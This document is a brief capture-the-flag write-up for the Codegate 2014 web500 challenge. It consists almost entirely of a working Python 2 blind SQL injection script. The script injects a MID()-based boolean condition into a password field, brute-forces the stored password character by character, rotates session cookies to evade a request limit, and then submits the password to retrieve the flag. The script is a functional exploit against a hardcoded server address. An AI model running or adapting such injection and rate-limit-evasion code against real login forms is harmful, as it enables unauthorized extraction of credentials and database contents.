codegate@2014- web500 writetup

#!/usr/bin/env python
#Blind SQL injection Exploit version 1.0
#Language: Python (2.6)
#Author: gamma95

import os
import sys
import urllib2
import struct
import urllib
import time
print """
    Codegate@2014: web500 writeup
    https://twitter.com/xchym
    Usage: python web500.py "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php" "password" "mysql"
"""
if len(sys.argv) != 4:
    print "[+] Syntax Error"
    exit()
url = sys.argv[1]
sql = sys.argv[2]
sqlserver = sys.argv[3]

def _gen_new_session():
    usock = urllib2.urlopen('http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/')
    _cookie = usock.info().get('Set-Cookie')
    return _cookie

def _get_flag(_session, _password):
    url = 'http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/auth.php'
    user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
    values = {'password':_password}
    headers = { 'User-Agent' : user_agent, 'Cookie': _session }
    data = urllib.urlencode(values)
    req = urllib2.Request(url, data, headers)
    response = urllib2.urlopen(req)
    the_page = response.read()
    return the_page

def encodeurl(string):
    return string.replace(' ','%20')

def execute(url, sql, sqlserver):
    _list_session=[]
    for line in xrange(0, 40):
        _list_session.append(_gen_new_session())
    lenght = 9999
    if sqlserver =='mysql':
        str1 = " OR 1=1 AND MID("
    else:
        print "[+] argv[4] = mssql or mysql !!! Plz check your input"
        exit()
    result = ""
    dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '$', '.','-','_','(',')','[',']','{','}','@','=','/','\\','|','#','?','!','<','>']
    count = 0
    check = 0
    for i in range(1, 31):
        user_agent = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20071008 Ubuntu/7.10 (gutsy) Firefox/2.0.0.6'
        kount = 0
        if check == 1:
            break
        for line in dic:
            kount = kount + 1
            flag = 0
            str2 = "," + str(i)+ ")=" + "'" + result + line + "'"
            chuoi = str1 + sql +','+ "1" + str2 + " and '1"
            print chuoi
            values={'password':"123' "+ chuoi}
            data = urllib.urlencode(values)
            #switch to another session for continue bruteforce searching, if not, may be the password will be deleted (over 120 requests limit check)
            headers = { 'Host': '58.229.183.24','User-Agent': user_agent, 'Referer' : url, 'Cookie': _list_session[count]}
            req = urllib2.Request(url, data, headers)
            try:
                response = urllib2.urlopen(req)
            except:
                print "[+] Connection error"
                exit()
            page = response.read()
            len1 = len(page)
            if "True" in page:
                count = count + 1
                result = result + line
                print result
                flag = 1
                break #
            elif kount == len(dic):
                check = 1
                break
            else:
                continue
    print "[+]Done, The password is: " + str(result)
    print "[+]Flag: " + _get_flag(_list_session[count], str(result))
    ##############

if True:

    print """
    [+] Sending Malicious Request
    [+] Plz wait ... :)
                """

    execute(url, sql, sqlserver)
else:
    print "Not vul"
    exit()
exit()